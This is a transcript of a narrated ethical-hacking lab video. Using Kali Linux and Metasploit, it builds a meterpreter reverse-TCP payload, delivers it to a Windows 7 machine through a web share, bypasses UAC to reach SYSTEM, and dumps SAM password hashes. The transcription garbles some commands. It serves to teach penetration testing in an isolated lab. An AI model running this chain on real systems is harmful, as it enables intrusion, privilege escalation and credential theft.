Hey everyone, so we're going to start the lab 44, escalating privilege by exploiting the client-side vulnerabilities. So privilege escalation is the demonstration of misusing a bug, configuration, imperfection, or the design oversight in a network in a working framework. You can say programming application to increase the lifted access to assist data regularly shielded from an application or a client, you can say. And the lab scenario, you can say, is that when someone is doing some maliciously, so they're going to start looking for the different way to escalate their privilege in the system. They can exploit the vulnerability, design flaw, or the configuration oversight in operating system or your third-party application or your software application, you can say, or the target system to gain elevated the access of the resources that are normally protected from an application or a user. So the privilege escalation can be vertical or the lateral. So we're going to use do operating system here, Kali Linux, and we have Windows 7. So our first work is to log in the Kali in virtual machine, you can see here, and click places, computer, so it's all about navigate to a file system. You have to create this, etc Apache 2. I'm telling you what to do. Apache 2.config. I'm going to open this file. So enter the command, the server name, localhost, new line, and save the file. So as we're going to enter new command, as we have done this, server name, localhost, and then you guys can save the file as we have done this. Then we'll go to launch the Windows 7 machine. There we go. Then you can log in Windows 7 after updated that file, and this work will start from again. Switch back to Kali, launch the terminal. There we go. And then we are going to start. The first command is service post start, enter. So starting this, it's a 9.1 database server. Then service for Metasploit. Exploit start. I'm going to start the Metasploit services on this. So you can see here the RPC, the web server, and the working already started. Then MSF console. Here we go. In this lab, we are going to exploit the client-side vulnerabilities, right? Then here we go, as we have entered in MSF. So work is to use the payload. So MSF payload space Windows / the metadata / reverse TCP, right, space localhost, the IP address of localhost, then we can check the IP address of Windows 7 machine, or sorry, the of the main machine. Kali, it's asking for the local host. So if config it's all about 1.14, so 192.168.1.14 space x space desktop exploit .exe. So it's a payload we are just creating on desktop, right? Here we go. Then you can check on desktop we created or not. Here we go, right? We have created MSF payload on the desktop. Then our work is to to share this particular exploit.exe to the victim machine, and this lab, as I told you, we are using Windows 7. So we are going to open a new command line to share the file. So we'll use the command make directory mkdir where should be with a space www and then share, right, enter. So then change the mode of the share folder to Zen55 by typing the command chmod space -r space 755 space / where www and obviously share, enter. Then change the ownership of the folder as to the www data. We're going to use the command for that is Sean, is CHOWN. It's not Sean Harris, okay? Then space www data colon www data space / where then www then obviously share, enter. After that space hyphen space where www Okay, then space share. So we have the next step is to start the Apache server to run the services for Apache. Then services Apache 2 and starting. It's okay, it's already running. Then the Apache server is running, so copy exploit.exe into the share folder. Now copy cp, then to root, stop exploit.exe space /var www, then share, enter. So as we have shared now, then switch back to the MSF console to terminal to create a handler. Here is MSF. So use exploit with multi-handler, enter. So we are on now handler. Then set the payload, Windows, the exe file we have share, so we are just going to get then reverse TCP, enter. So payload for reverse TCP. Then we'll give the set localhost, again the IP address of the machine 1.14 as we have checked before, enter. Now part is used to exploit, simply exploit space -j space -z, enter. Then switch back to the Windows 7 machine. Here we go. Open the Explorer as we have created for www on internet. So we are going to check the IP address is 192.1.14 share as we have created for exploit.exe is right here. Then we can run the file. It's asking for, it's trying to connect with the machine to Kali Linux, and it's working now. Let me check. Then back to the Kali Linux as we have installed this. The Meterpreter session 1 open on this, right? So we are just creating for sessions. Enter. So we are now Meterpreter, and get UID. First thing is the server name is this, then You can observe the Metapretor server is running with the normal user privilege. So we'll not be able to execute the commands such like run, the hash dump to get the SAM file or the password and all these things. So that require the admin privilege. So for that we are just will use the command. So for that, let us check this by executing run hash dump. Enter. Trying to check. Operation is failed, access denied, as I've told you. Now we'll use the command get system space -t space 1, enter. Again access denied. Now we shall try to bypass the user account control, right? Setting this is blocking you from gaining unrestricted access or unauthorized access to the machine. So now we'll use background to the current Metapretor session, type background. Okay, we are on now handler again. So we'll use the command now, use space exploit, then Windows local bypass UAC, user access control, right? And then enter. So now we are just bypass the UAC. Now we can play here, show options. Here we go, the session required here, description is running this module on, name Windows exploit target we have, then set session 1. Here we go. Now again to set payload, Windows, the Metapretor, reverse TCP obviously, enter. Next step is to show the options. After this command we have, you can see here, 3 things: localhost port and the session we have created. Then we'll use the command settle host, again the IP address 1.14, enter, then exploit. The Metapretor session 2 open, the new session you created. Now let us check with the current user ID state of the Metapretor. So we can go with get UID. Server name, then get system, for the system via technique 1, then got as we got that. Here we go. So now it's all about to check the get UID. Now you can see is an authority system. Last we got this. After the exploit we got user ID, then we can run hash dump. Here we go. Okay, it's obtaining the boot key, calculating hatch boot. Here we go. This is all about the admin, the guest, and the users hashes. So this is all about, we have used, first what we have done, we have created exploit command. See the packet we have created, right, by using MSF. Then we have shared the packet on the www of the victim machine directory. Then by accessing that particular directory, we have executed that particular exploit.exe command. After that, we have created, again we back to the MSF console. Then we have used the handler, then metaparator. Then we have shown you that we didn't get the proper GUID and the hash dump because we don't have the admin access control. Then what we have done, we have used the main command is bypass the UAC, user access control, right? Again, after that, when we executed by UAC, bypass UAC, then again back to the MSF, right? We have created again a handler, then metaparator. After executing that particular exe, right, we got the hash dump, right? So this is all about, we have exploited the vulnerability on the client side. Here we have finished your lab 44, escalating privileges by exploiting client side vulnerabilities, right? Thank you.